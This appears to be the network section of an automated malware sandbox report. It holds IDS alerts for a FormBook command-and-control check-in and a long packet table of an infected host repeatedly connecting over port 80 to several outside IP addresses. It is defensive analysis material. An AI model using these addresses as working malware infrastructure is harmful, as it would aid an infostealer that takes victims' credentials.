                                                                      2024-11-06T05:24:59.706745+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.6500353.33.130.19080TCP
                                                                      2024-11-06T05:24:59.706745+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.6500353.33.130.19080TCP
                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Nov 6, 2024 05:21:47.922610998 CET4994480192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:21:47.928415060 CET80499443.33.130.190192.168.2.6
                                                                      Nov 6, 2024 05:21:47.928486109 CET4994480192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:21:47.936393976 CET4994480192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:21:47.942316055 CET80499443.33.130.190192.168.2.6
                                                                      Nov 6, 2024 05:21:49.613399029 CET80499443.33.130.190192.168.2.6
                                                                      Nov 6, 2024 05:21:49.647742987 CET80499443.33.130.190192.168.2.6
                                                                      Nov 6, 2024 05:21:49.647859097 CET4994480192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:21:49.649271965 CET4994480192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:21:49.654061079 CET80499443.33.130.190192.168.2.6
                                                                      Nov 6, 2024 05:22:12.790563107 CET4998580192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:22:12.795468092 CET80499853.33.130.190192.168.2.6
                                                                      Nov 6, 2024 05:22:12.795547962 CET4998580192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:22:12.806332111 CET4998580192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:22:12.811328888 CET80499853.33.130.190192.168.2.6
                                                                      Nov 6, 2024 05:22:13.423151016 CET80499853.33.130.190192.168.2.6
                                                                      Nov 6, 2024 05:22:13.423229933 CET4998580192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:22:14.320878983 CET4998580192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:22:14.325828075 CET80499853.33.130.190192.168.2.6
                                                                      Nov 6, 2024 05:22:15.339679003 CET4998780192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:22:15.344870090 CET80499873.33.130.190192.168.2.6
                                                                      Nov 6, 2024 05:22:15.344938993 CET4998780192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:22:15.355885029 CET4998780192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:22:15.360635996 CET80499873.33.130.190192.168.2.6
                                                                      Nov 6, 2024 05:22:16.034790993 CET80499873.33.130.190192.168.2.6
                                                                      Nov 6, 2024 05:22:16.034847021 CET4998780192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:22:16.867885113 CET4998780192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:22:16.872711897 CET80499873.33.130.190192.168.2.6
                                                                      Nov 6, 2024 05:22:17.886270046 CET4998880192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:22:17.891197920 CET80499883.33.130.190192.168.2.6
                                                                      Nov 6, 2024 05:22:17.891263962 CET4998880192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:22:17.900614977 CET4998880192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:22:17.905467987 CET80499883.33.130.190192.168.2.6
                                                                      Nov 6, 2024 05:22:17.905579090 CET80499883.33.130.190192.168.2.6
                                                                      Nov 6, 2024 05:22:18.518309116 CET80499883.33.130.190192.168.2.6
                                                                      Nov 6, 2024 05:22:18.518579006 CET4998880192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:22:19.414658070 CET4998880192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:22:19.419539928 CET80499883.33.130.190192.168.2.6
                                                                      Nov 6, 2024 05:22:20.433213949 CET4998980192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:22:20.438195944 CET80499893.33.130.190192.168.2.6
                                                                      Nov 6, 2024 05:22:20.438275099 CET4998980192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:22:20.444834948 CET4998980192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:22:20.449635983 CET80499893.33.130.190192.168.2.6
                                                                      Nov 6, 2024 05:22:21.107662916 CET80499893.33.130.190192.168.2.6
                                                                      Nov 6, 2024 05:22:21.140826941 CET80499893.33.130.190192.168.2.6
                                                                      Nov 6, 2024 05:22:21.140922070 CET4998980192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:22:21.141777039 CET4998980192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:22:21.146497011 CET80499893.33.130.190192.168.2.6
                                                                      Nov 6, 2024 05:22:26.767404079 CET4999080192.168.2.638.88.82.56
                                                                      Nov 6, 2024 05:22:26.772237062 CET804999038.88.82.56192.168.2.6
                                                                      Nov 6, 2024 05:22:26.772335052 CET4999080192.168.2.638.88.82.56
                                                                      Nov 6, 2024 05:22:26.782284975 CET4999080192.168.2.638.88.82.56
                                                                      Nov 6, 2024 05:22:26.787218094 CET804999038.88.82.56192.168.2.6
                                                                      Nov 6, 2024 05:22:27.479523897 CET804999038.88.82.56192.168.2.6
                                                                      Nov 6, 2024 05:22:27.479537964 CET804999038.88.82.56192.168.2.6
                                                                      Nov 6, 2024 05:22:27.479693890 CET4999080192.168.2.638.88.82.56
                                                                      Nov 6, 2024 05:22:27.530277967 CET804999038.88.82.56192.168.2.6
                                                                      Nov 6, 2024 05:22:27.530349016 CET4999080192.168.2.638.88.82.56
                                                                      Nov 6, 2024 05:22:28.289681911 CET4999080192.168.2.638.88.82.56
                                                                      Nov 6, 2024 05:22:29.308111906 CET4999180192.168.2.638.88.82.56
                                                                      Nov 6, 2024 05:22:29.313014030 CET804999138.88.82.56192.168.2.6
                                                                      Nov 6, 2024 05:22:29.313149929 CET4999180192.168.2.638.88.82.56
                                                                      Nov 6, 2024 05:22:29.333177090 CET4999180192.168.2.638.88.82.56
                                                                      Nov 6, 2024 05:22:29.338051081 CET804999138.88.82.56192.168.2.6
                                                                      Nov 6, 2024 05:22:30.016262054 CET804999138.88.82.56192.168.2.6
                                                                      Nov 6, 2024 05:22:30.016283989 CET804999138.88.82.56192.168.2.6
                                                                      Nov 6, 2024 05:22:30.016356945 CET4999180192.168.2.638.88.82.56
                                                                      Nov 6, 2024 05:22:30.069760084 CET804999138.88.82.56192.168.2.6
                                                                      Nov 6, 2024 05:22:30.069837093 CET4999180192.168.2.638.88.82.56
                                                                      Nov 6, 2024 05:22:30.836610079 CET4999180192.168.2.638.88.82.56
                                                                      Nov 6, 2024 05:22:31.855269909 CET4999280192.168.2.638.88.82.56
                                                                      Nov 6, 2024 05:22:31.860296011 CET804999238.88.82.56192.168.2.6
                                                                      Nov 6, 2024 05:22:31.860385895 CET4999280192.168.2.638.88.82.56
                                                                      Nov 6, 2024 05:22:31.870769024 CET4999280192.168.2.638.88.82.56
                                                                      Nov 6, 2024 05:22:31.875860929 CET804999238.88.82.56192.168.2.6
                                                                      Nov 6, 2024 05:22:31.877566099 CET804999238.88.82.56192.168.2.6
                                                                      Nov 6, 2024 05:22:32.586015940 CET804999238.88.82.56192.168.2.6
                                                                      Nov 6, 2024 05:22:32.586035967 CET804999238.88.82.56192.168.2.6
                                                                      Nov 6, 2024 05:22:32.586085081 CET4999280192.168.2.638.88.82.56
                                                                      Nov 6, 2024 05:22:32.637398958 CET804999238.88.82.56192.168.2.6
                                                                      Nov 6, 2024 05:22:32.637494087 CET4999280192.168.2.638.88.82.56
                                                                      Nov 6, 2024 05:22:33.383555889 CET4999280192.168.2.638.88.82.56
                                                                      Nov 6, 2024 05:22:34.403141975 CET4999380192.168.2.638.88.82.56
                                                                      Nov 6, 2024 05:22:34.407973051 CET804999338.88.82.56192.168.2.6
                                                                      Nov 6, 2024 05:22:34.408072948 CET4999380192.168.2.638.88.82.56
                                                                      Nov 6, 2024 05:22:34.418087959 CET4999380192.168.2.638.88.82.56
                                                                      Nov 6, 2024 05:22:34.422938108 CET804999338.88.82.56192.168.2.6
                                                                      Nov 6, 2024 05:22:35.107903957 CET804999338.88.82.56192.168.2.6
                                                                      Nov 6, 2024 05:22:35.107922077 CET804999338.88.82.56192.168.2.6
                                                                      Nov 6, 2024 05:22:35.108052969 CET4999380192.168.2.638.88.82.56
                                                                      Nov 6, 2024 05:22:35.160689116 CET804999338.88.82.56192.168.2.6
                                                                      Nov 6, 2024 05:22:35.160780907 CET4999380192.168.2.638.88.82.56
                                                                      Nov 6, 2024 05:22:35.161936045 CET4999380192.168.2.638.88.82.56
                                                                      Nov 6, 2024 05:22:35.166950941 CET804999338.88.82.56192.168.2.6
                                                                      Nov 6, 2024 05:22:40.187339067 CET4999480192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:22:40.192255974 CET80499943.33.130.190192.168.2.6
                                                                      Nov 6, 2024 05:22:40.192344904 CET4999480192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:22:40.202447891 CET4999480192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:22:40.207266092 CET80499943.33.130.190192.168.2.6
                                                                      Nov 6, 2024 05:22:40.818212032 CET80499943.33.130.190192.168.2.6
                                                                      Nov 6, 2024 05:22:40.818273067 CET4999480192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:22:41.711549997 CET4999480192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:22:41.717314005 CET80499943.33.130.190192.168.2.6
                                                                      Nov 6, 2024 05:22:42.730226040 CET4999580192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:22:42.844016075 CET80499953.33.130.190192.168.2.6
                                                                      Nov 6, 2024 05:22:42.844198942 CET4999580192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:22:42.854130983 CET4999580192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:22:42.858912945 CET80499953.33.130.190192.168.2.6
                                                                      Nov 6, 2024 05:22:43.502629042 CET80499953.33.130.190192.168.2.6
                                                                      Nov 6, 2024 05:22:43.502677917 CET4999580192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:22:44.367893934 CET4999580192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:22:44.480529070 CET80499953.33.130.190192.168.2.6
                                                                      Nov 6, 2024 05:22:45.386634111 CET4999680192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:22:45.391583920 CET80499963.33.130.190192.168.2.6
                                                                      Nov 6, 2024 05:22:45.391669989 CET4999680192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:22:45.404195070 CET4999680192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:22:45.409063101 CET80499963.33.130.190192.168.2.6
                                                                      Nov 6, 2024 05:22:45.409126043 CET80499963.33.130.190192.168.2.6
                                                                      Nov 6, 2024 05:22:46.016849041 CET80499963.33.130.190192.168.2.6
                                                                      Nov 6, 2024 05:22:46.016906977 CET4999680192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:22:46.916645050 CET4999680192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:22:46.921612024 CET80499963.33.130.190192.168.2.6
                                                                      Nov 6, 2024 05:22:47.940743923 CET4999880192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:22:47.945668936 CET80499983.33.130.190192.168.2.6
                                                                      Nov 6, 2024 05:22:47.945740938 CET4999880192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:22:47.954143047 CET4999880192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:22:47.959002018 CET80499983.33.130.190192.168.2.6
                                                                      Nov 6, 2024 05:22:49.499651909 CET80499983.33.130.190192.168.2.6
                                                                      Nov 6, 2024 05:22:49.500086069 CET80499983.33.130.190192.168.2.6
                                                                      Nov 6, 2024 05:22:49.500133038 CET4999880192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:22:49.503000021 CET4999880192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:22:49.507787943 CET80499983.33.130.190192.168.2.6
                                                                      Nov 6, 2024 05:22:54.550966978 CET4999980192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:22:54.555785894 CET80499993.33.130.190192.168.2.6
                                                                      Nov 6, 2024 05:22:54.556741953 CET4999980192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:22:54.568655968 CET4999980192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:22:54.573468924 CET80499993.33.130.190192.168.2.6
                                                                      Nov 6, 2024 05:22:55.182867050 CET80499993.33.130.190192.168.2.6
                                                                      Nov 6, 2024 05:22:55.184715033 CET4999980192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:22:56.070987940 CET4999980192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:22:56.076083899 CET80499993.33.130.190192.168.2.6
                                                                      Nov 6, 2024 05:22:57.090728045 CET5000080192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:22:57.095762968 CET80500003.33.130.190192.168.2.6
                                                                      Nov 6, 2024 05:22:57.098937035 CET5000080192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:22:57.110697031 CET5000080192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:22:57.115556955 CET80500003.33.130.190192.168.2.6
                                                                      Nov 6, 2024 05:22:57.782618046 CET80500003.33.130.190192.168.2.6
                                                                      Nov 6, 2024 05:22:57.782675982 CET5000080192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:22:58.617928982 CET5000080192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:22:58.622899055 CET80500003.33.130.190192.168.2.6
                                                                      Nov 6, 2024 05:22:59.643079996 CET5000180192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:22:59.648250103 CET80500013.33.130.190192.168.2.6
                                                                      Nov 6, 2024 05:22:59.648317099 CET5000180192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:22:59.659903049 CET5000180192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:22:59.664876938 CET80500013.33.130.190192.168.2.6
                                                                      Nov 6, 2024 05:22:59.664891005 CET80500013.33.130.190192.168.2.6
                                                                      Nov 6, 2024 05:23:00.285797119 CET80500013.33.130.190192.168.2.6
                                                                      Nov 6, 2024 05:23:00.285861015 CET5000180192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:23:01.164679050 CET5000180192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:23:01.169644117 CET80500013.33.130.190192.168.2.6
                                                                      Nov 6, 2024 05:23:02.183273077 CET5000280192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:23:02.188345909 CET80500023.33.130.190192.168.2.6
                                                                      Nov 6, 2024 05:23:02.188429117 CET5000280192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:23:02.195514917 CET5000280192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:23:02.200287104 CET80500023.33.130.190192.168.2.6
                                                                      Nov 6, 2024 05:23:02.816456079 CET80500023.33.130.190192.168.2.6
                                                                      Nov 6, 2024 05:23:02.816770077 CET80500023.33.130.190192.168.2.6
                                                                      Nov 6, 2024 05:23:02.816884995 CET5000280192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:23:02.819336891 CET5000280192.168.2.63.33.130.190
                                                                      Nov 6, 2024 05:23:02.824142933 CET80500023.33.130.190192.168.2.6
                                                                      Nov 6, 2024 05:23:07.838715076 CET5000380192.168.2.667.223.117.142
                                                                      Nov 6, 2024 05:23:07.843616009 CET805000367.223.117.142192.168.2.6
                                                                      Nov 6, 2024 05:23:07.843693972 CET5000380192.168.2.667.223.117.142
                                                                      Nov 6, 2024 05:23:07.856280088 CET5000380192.168.2.667.223.117.142
                                                                      Nov 6, 2024 05:23:07.861174107 CET805000367.223.117.142192.168.2.6
                                                                      Nov 6, 2024 05:23:08.525800943 CET805000367.223.117.142192.168.2.6
                                                                      Nov 6, 2024 05:23:08.564089060 CET805000367.223.117.142192.168.2.6
                                                                      Nov 6, 2024 05:23:08.570889950 CET5000380192.168.2.667.223.117.142
                                                                      Nov 6, 2024 05:23:09.372680902 CET5000380192.168.2.667.223.117.142
                                                                      Nov 6, 2024 05:23:10.386941910 CET5000480192.168.2.667.223.117.142
                                                                      Nov 6, 2024 05:23:10.391848087 CET805000467.223.117.142192.168.2.6
                                                                      Nov 6, 2024 05:23:10.391916990 CET5000480192.168.2.667.223.117.142
                                                                      Nov 6, 2024 05:23:10.403677940 CET5000480192.168.2.667.223.117.142
                                                                      Nov 6, 2024 05:23:10.408515930 CET805000467.223.117.142192.168.2.6
                                                                      Nov 6, 2024 05:23:11.082226038 CET805000467.223.117.142192.168.2.6
                                                                      Nov 6, 2024 05:23:11.120277882 CET805000467.223.117.142192.168.2.6
                                                                      Nov 6, 2024 05:23:11.120388985 CET5000480192.168.2.667.223.117.142
                                                                      Nov 6, 2024 05:23:11.914798975 CET5000480192.168.2.667.223.117.142
                                                                      Nov 6, 2024 05:23:12.936718941 CET5000580192.168.2.667.223.117.142
                                                                      Nov 6, 2024 05:23:12.941653013 CET805000567.223.117.142192.168.2.6
                                                                      Nov 6, 2024 05:23:12.941735029 CET5000580192.168.2.667.223.117.142
                                                                      Nov 6, 2024 05:23:12.951807022 CET5000580192.168.2.667.223.117.142
                                                                      Nov 6, 2024 05:23:12.956666946 CET805000567.223.117.142192.168.2.6
                                                                      Nov 6, 2024 05:23:12.956830978 CET805000567.223.117.142192.168.2.6
                                                                      Nov 6, 2024 05:23:13.629887104 CET805000567.223.117.142192.168.2.6
                                                                      Nov 6, 2024 05:23:13.667840958 CET805000567.223.117.142192.168.2.6
                                                                      Nov 6, 2024 05:23:13.667886972 CET5000580192.168.2.667.223.117.142
                                                                      Nov 6, 2024 05:23:14.464720011 CET5000580192.168.2.667.223.117.142
                                                                      Nov 6, 2024 05:23:15.480432034 CET5000680192.168.2.667.223.117.142
                                                                      Nov 6, 2024 05:23:15.485307932 CET805000667.223.117.142192.168.2.6
                                                                      Nov 6, 2024 05:23:15.485379934 CET5000680192.168.2.667.223.117.142
                                                                      Nov 6, 2024 05:23:15.492445946 CET5000680192.168.2.667.223.117.142
                                                                      Nov 6, 2024 05:23:15.497313023 CET805000667.223.117.142192.168.2.6
                                                                      Nov 6, 2024 05:23:16.177556038 CET805000667.223.117.142192.168.2.6
                                                                      Nov 6, 2024 05:23:16.216299057 CET805000667.223.117.142192.168.2.6
                                                                      Nov 6, 2024 05:23:16.216401100 CET5000680192.168.2.667.223.117.142
                                                                      Nov 6, 2024 05:23:16.217252970 CET5000680192.168.2.667.223.117.142
                                                                      Nov 6, 2024 05:23:16.221975088 CET805000667.223.117.142192.168.2.6
                                                                      Nov 6, 2024 05:23:21.262903929 CET5000780192.168.2.6178.79.184.196
                                                                      Nov 6, 2024 05:23:21.267699003 CET8050007178.79.184.196192.168.2.6
                                                                      Nov 6, 2024 05:23:21.272738934 CET5000780192.168.2.6178.79.184.196
                                                                      Nov 6, 2024 05:23:21.284688950 CET5000780192.168.2.6178.79.184.196
                                                                      Nov 6, 2024 05:23:21.289506912 CET8050007178.79.184.196192.168.2.6
                                                                      Nov 6, 2024 05:23:22.071804047 CET8050007178.79.184.196192.168.2.6
                                                                      Nov 6, 2024 05:23:22.158199072 CET5000780192.168.2.6178.79.184.196
                                                                      Nov 6, 2024 05:23:22.179918051 CET8050007178.79.184.196192.168.2.6
                                                                      Nov 6, 2024 05:23:22.179958105 CET5000780192.168.2.6178.79.184.196
                                                                      Nov 6, 2024 05:23:22.795336008 CET5000780192.168.2.6178.79.184.196
                                                                      Nov 6, 2024 05:23:23.808247089 CET5000880192.168.2.6178.79.184.196
                                                                      Nov 6, 2024 05:23:23.813153982 CET8050008178.79.184.196192.168.2.6
                                                                      Nov 6, 2024 05:23:23.813224077 CET5000880192.168.2.6178.79.184.196
                                                                      Nov 6, 2024 05:23:23.825119019 CET5000880192.168.2.6178.79.184.196
                                                                      Nov 6, 2024 05:23:23.829942942 CET8050008178.79.184.196192.168.2.6
                                                                      Nov 6, 2024 05:23:24.620362043 CET8050008178.79.184.196192.168.2.6
                                                                      Nov 6, 2024 05:23:24.728271961 CET8050008178.79.184.196192.168.2.6
                                                                      Nov 6, 2024 05:23:24.728373051 CET5000880192.168.2.6178.79.184.196
                                                                      Nov 6, 2024 05:23:25.338604927 CET5000880192.168.2.6178.79.184.196
                                                                      Nov 6, 2024 05:23:26.355957031 CET5000980192.168.2.6178.79.184.196
                                                                      Nov 6, 2024 05:23:26.360841036 CET8050009178.79.184.196192.168.2.6
                                                                      Nov 6, 2024 05:23:26.360909939 CET5000980192.168.2.6178.79.184.196
                                                                      Nov 6, 2024 05:23:26.372837067 CET5000980192.168.2.6178.79.184.196
                                                                      Nov 6, 2024 05:23:26.377650023 CET8050009178.79.184.196192.168.2.6
                                                                      Nov 6, 2024 05:23:26.377811909 CET8050009178.79.184.196192.168.2.6
                                                                      Nov 6, 2024 05:23:27.174319029 CET8050009178.79.184.196192.168.2.6
                                                                      Nov 6, 2024 05:23:27.281343937 CET8050009178.79.184.196192.168.2.6
                                                                      Nov 6, 2024 05:23:27.281421900 CET5000980192.168.2.6178.79.184.196
                                                                      Nov 6, 2024 05:23:27.883454084 CET5000980192.168.2.6178.79.184.196
                                                                      Nov 6, 2024 05:23:28.904701948 CET5001080192.168.2.6178.79.184.196
                                                                      Nov 6, 2024 05:23:28.909645081 CET8050010178.79.184.196192.168.2.6
                                                                      Nov 6, 2024 05:23:28.909884930 CET5001080192.168.2.6178.79.184.196
                                                                      Nov 6, 2024 05:23:28.916708946 CET5001080192.168.2.6178.79.184.196
                                                                      Nov 6, 2024 05:23:28.921561956 CET8050010178.79.184.196192.168.2.6
                                                                      Nov 6, 2024 05:23:29.716624975 CET8050010178.79.184.196192.168.2.6
                                                                      Nov 6, 2024 05:23:29.790673971 CET5001080192.168.2.6178.79.184.196
                                                                      Nov 6, 2024 05:23:29.822171926 CET8050010178.79.184.196192.168.2.6
                                                                      Nov 6, 2024 05:23:29.822271109 CET5001080192.168.2.6178.79.184.196
                                                                      Nov 6, 2024 05:23:29.823123932 CET5001080192.168.2.6178.79.184.196
                                                                      Nov 6, 2024 05:23:29.827862978 CET8050010178.79.184.196192.168.2.6
                                                                      Nov 6, 2024 05:23:43.036726952 CET5001180192.168.2.6185.179.189.193
                                                                      Nov 6, 2024 05:23:43.041593075 CET8050011185.179.189.193192.168.2.6
                                                                      Nov 6, 2024 05:23:43.048723936 CET5001180192.168.2.6185.179.189.193
                                                                      Nov 6, 2024 05:23:43.056734085 CET5001180192.168.2.6185.179.189.193
                                                                      Nov 6, 2024 05:23:43.061563015 CET8050011185.179.189.193192.168.2.6
                                                                      Nov 6, 2024 05:23:44.092056036 CET8050011185.179.189.193192.168.2.6
                                                                      Nov 6, 2024 05:23:44.092072010 CET8050011185.179.189.193192.168.2.6
                                                                      Nov 6, 2024 05:23:44.092128992 CET5001180192.168.2.6185.179.189.193
                                                                      Nov 6, 2024 05:23:44.092145920 CET8050011185.179.189.193192.168.2.6
                                                                      Nov 6, 2024 05:23:44.092187881 CET8050011185.179.189.193192.168.2.6
                                                                      Nov 6, 2024 05:23:44.092204094 CET8050011185.179.189.193192.168.2.6
                                                                      Nov 6, 2024 05:23:44.092222929 CET5001180192.168.2.6185.179.189.193
                                                                      Nov 6, 2024 05:23:44.092243910 CET8050011185.179.189.193192.168.2.6
                                                                      Nov 6, 2024 05:23:44.092255116 CET8050011185.179.189.193192.168.2.6
                                                                      Nov 6, 2024 05:23:44.092279911 CET5001180192.168.2.6185.179.189.193
                                                                      Nov 6, 2024 05:23:44.133405924 CET5001180192.168.2.6185.179.189.193
                                                                      Nov 6, 2024 05:23:44.240217924 CET8050011185.179.189.193192.168.2.6
                                                                      Nov 6, 2024 05:23:44.240264893 CET5001180192.168.2.6185.179.189.193
                                                                      Nov 6, 2024 05:23:44.556735039 CET5001180192.168.2.6185.179.189.193
                                                                      Nov 6, 2024 05:23:45.574641943 CET5001380192.168.2.6185.179.189.193
                                                                      Nov 6, 2024 05:23:45.579554081 CET8050013185.179.189.193192.168.2.6
                                                                      Nov 6, 2024 05:23:45.579622984 CET5001380192.168.2.6185.179.189.193
                                                                      Nov 6, 2024 05:23:45.593503952 CET5001380192.168.2.6185.179.189.193
                                                                      Nov 6, 2024 05:23:45.598361969 CET8050013185.179.189.193192.168.2.6
                                                                      Nov 6, 2024 05:23:46.664419889 CET8050013185.179.189.193192.168.2.6
                                                                      Nov 6, 2024 05:23:46.664438009 CET8050013185.179.189.193192.168.2.6
                                                                      Nov 6, 2024 05:23:46.664531946 CET8050013185.179.189.193192.168.2.6
                                                                      Nov 6, 2024 05:23:46.664542913 CET8050013185.179.189.193192.168.2.6
                                                                      Nov 6, 2024 05:23:46.664554119 CET8050013185.179.189.193192.168.2.6
                                                                      Nov 6, 2024 05:23:46.664565086 CET8050013185.179.189.193192.168.2.6
                                                                      Nov 6, 2024 05:23:46.664576054 CET8050013185.179.189.193192.168.2.6
                                                                      Nov 6, 2024 05:23:46.664592981 CET5001380192.168.2.6185.179.189.193
                                                                      Nov 6, 2024 05:23:46.664741039 CET5001380192.168.2.6185.179.189.193
                                                                      Nov 6, 2024 05:23:46.824038982 CET8050013185.179.189.193192.168.2.6
                                                                      Nov 6, 2024 05:23:46.824800014 CET5001380192.168.2.6185.179.189.193
                                                                      Nov 6, 2024 05:23:47.104732990 CET5001380192.168.2.6185.179.189.193
                                                                      Nov 6, 2024 05:23:48.120929003 CET5001480192.168.2.6185.179.189.193
                                                                      Nov 6, 2024 05:23:48.125811100 CET8050014185.179.189.193192.168.2.6
                                                                      Nov 6, 2024 05:23:48.125876904 CET5001480192.168.2.6185.179.189.193
                                                                      Nov 6, 2024 05:23:48.136862040 CET5001480192.168.2.6185.179.189.193
                                                                      Nov 6, 2024 05:23:48.141643047 CET8050014185.179.189.193192.168.2.6
                                                                      Nov 6, 2024 05:23:48.141746044 CET8050014185.179.189.193192.168.2.6
                                                                      Nov 6, 2024 05:23:49.124341965 CET8050014185.179.189.193192.168.2.6
                                                                      Nov 6, 2024 05:23:49.124360085 CET8050014185.179.189.193192.168.2.6
                                                                      Nov 6, 2024 05:23:49.124370098 CET8050014185.179.189.193192.168.2.6
                                                                      Nov 6, 2024 05:23:49.124378920 CET8050014185.179.189.193192.168.2.6
                                                                      Nov 6, 2024 05:23:49.124391079 CET8050014185.179.189.193192.168.2.6
                                                                      Nov 6, 2024 05:23:49.124402046 CET8050014185.179.189.193192.168.2.6
                                                                      Nov 6, 2024 05:23:49.124450922 CET5001480192.168.2.6185.179.189.193
                                                                      Nov 6, 2024 05:23:49.124450922 CET5001480192.168.2.6185.179.189.193
                                                                      Nov 6, 2024 05:23:49.124501944 CET5001480192.168.2.6185.179.189.193
                                                                      Nov 6, 2024 05:23:49.290195942 CET8050014185.179.189.193192.168.2.6
                                                                      Nov 6, 2024 05:23:49.290797949 CET5001480192.168.2.6185.179.189.193
                                                                      Nov 6, 2024 05:23:49.649151087 CET5001480192.168.2.6185.179.189.193
                                                                      Nov 6, 2024 05:23:50.668761969 CET5001580192.168.2.6185.179.189.193
                                                                      Nov 6, 2024 05:23:50.673722029 CET8050015185.179.189.193192.168.2.6
                                                                      Nov 6, 2024 05:23:50.680743933 CET5001580192.168.2.6185.179.189.193
                                                                      Nov 6, 2024 05:23:50.684751987 CET5001580192.168.2.6185.179.189.193
                                                                      Nov 6, 2024 05:23:50.689629078 CET8050015185.179.189.193192.168.2.6
                                                                      Nov 6, 2024 05:23:51.677463055 CET8050015185.179.189.193192.168.2.6
                                                                      Nov 6, 2024 05:23:51.677479982 CET8050015185.179.189.193192.168.2.6
                                                                      Nov 6, 2024 05:23:51.677489996 CET8050015185.179.189.193192.168.2.6
                                                                      Nov 6, 2024 05:23:51.677500963 CET8050015185.179.189.193192.168.2.6
                                                                      Nov 6, 2024 05:23:51.677511930 CET8050015185.179.189.193192.168.2.6
                                                                      Nov 6, 2024 05:23:51.677521944 CET8050015185.179.189.193192.168.2.6
                                                                      Nov 6, 2024 05:23:51.677536011 CET8050015185.179.189.193192.168.2.6
                                                                      Nov 6, 2024 05:23:51.677547932 CET8050015185.179.189.193192.168.2.6
                                                                      Nov 6, 2024 05:23:51.677558899 CET8050015185.179.189.193192.168.2.6
                                                                      Nov 6, 2024 05:23:51.677568913 CET8050015185.179.189.193192.168.2.6
                                                                      Nov 6, 2024 05:23:51.677592039 CET5001580192.168.2.6185.179.189.193
                                                                      Nov 6, 2024 05:23:51.677625895 CET5001580192.168.2.6185.179.189.193
                                                                      Nov 6, 2024 05:23:51.682486057 CET8050015185.179.189.193192.168.2.6
                                                                      Nov 6, 2024 05:23:51.682504892 CET8050015185.179.189.193192.168.2.6
                                                                      Nov 6, 2024 05:23:51.682538986 CET5001580192.168.2.6185.179.189.193
                                                                      Nov 6, 2024 05:23:51.682822943 CET8050015185.179.189.193192.168.2.6
                                                                      Nov 6, 2024 05:23:51.727178097 CET5001580192.168.2.6185.179.189.193
                                                                      Nov 6, 2024 05:23:51.834570885 CET8050015185.179.189.193192.168.2.6
                                                                      Nov 6, 2024 05:23:51.834609985 CET8050015185.179.189.193192.168.2.6
                                                                      Nov 6, 2024 05:23:51.834625006 CET8050015185.179.189.193192.168.2.6
                                                                      Nov 6, 2024 05:23:51.834636927 CET8050015185.179.189.193192.168.2.6
                                                                      Nov 6, 2024 05:23:51.834655046 CET5001580192.168.2.6185.179.189.193
                                                                      Nov 6, 2024 05:23:51.834712029 CET5001580192.168.2.6185.179.189.193
                                                                      Nov 6, 2024 05:23:51.834794044 CET8050015185.179.189.193192.168.2.6
                                                                      Nov 6, 2024 05:23:51.834806919 CET8050015185.179.189.193192.168.2.6
                                                                      Nov 6, 2024 05:23:51.834825993 CET8050015185.179.189.193192.168.2.6
                                                                      Nov 6, 2024 05:23:51.834841013 CET8050015185.179.189.193192.168.2.6
